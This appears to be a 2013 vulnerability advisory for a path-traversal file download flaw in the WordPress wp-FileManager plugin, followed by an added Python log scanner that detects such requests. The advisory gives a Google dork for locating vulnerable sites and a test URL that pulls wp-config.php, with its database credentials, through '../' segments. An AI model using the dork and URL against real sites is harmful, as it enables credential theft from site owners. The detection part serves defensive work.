Tuesday, 31 December 2013

WordPress wp-FileManager Local File Download Vulnerability

Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Vuln. Plat.:  Web Application
Test Platform :  Linux
==============================================


Exploit Note :
In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

Google Dorks :
inurl:wp-content/plugins/wp-filemanager/

Test :
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
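
Detection example (added here; not part of the original advisory and not the plugin's code): a log scanner that flags requests to the libfile.php endpoint shown above when action=download is combined with ".." segments in path or filename, including percent-encoded forms. The combined access-log format, the function names and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter names are taken from the advisory's test URL.
ENDPOINT = "/wp-content/plugins/wp-filemanager/incl/libfile.php"
# Request portion of a combined-format access log line (assumed log format).
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Dec/2013:10:00:01 +0000] "GET ' + ENDPOINT +
    '?&path=../../&filename=wp-config.php&action=download HTTP/1.1" 200 3021',
    '203.0.113.7 - - [31/Dec/2013:10:00:05 +0000] "GET ' + ENDPOINT +
    '?path=%252e%252e%2F&filename=wp-config.php&action=download HTTP/1.1" 403 199',
    '198.51.100.4 - - [31/Dec/2013:10:01:00 +0000] "GET ' + ENDPOINT +
    '?path=uploads/&filename=report.pdf&action=download HTTP/1.1" 200 88211',
    '198.51.100.4 - - [31/Dec/2013:10:02:00 +0000] "GET /index.php?path=../ HTTP/1.1" 200 512',
]

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded dot segments are still seen."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def has_traversal(value):
    """True if any path segment is '..' after decoding and slash normalisation."""
    return ".." in decode(value).replace("\\", "/").split("/")

def classify(target):
    """Return 'traversal' for a download request that climbs directories, else None."""
    parts = urlsplit(target)
    if not decode(parts.path).lower().endswith(ENDPOINT):
        return None
    query = parse_qs(parts.query)
    if "download" not in query.get("action", []):
        return None
    values = query.get("path", []) + query.get("filename", [])
    return "traversal" if any(has_traversal(v) for v in values) else None

def scan(lines):
    """Return (client_ip, http_status, reason) for every flagged log line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        reason = classify(m.group(2)) if m else None
        if reason:
            hits.append((m.group(1), int(m.group(3)), reason))
    return hits
```

A flagged line with status 200 means the server answered the download request and should be reviewed first; the plain download of report.pdf from uploads/ is not flagged.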


OK, that's all from Clound

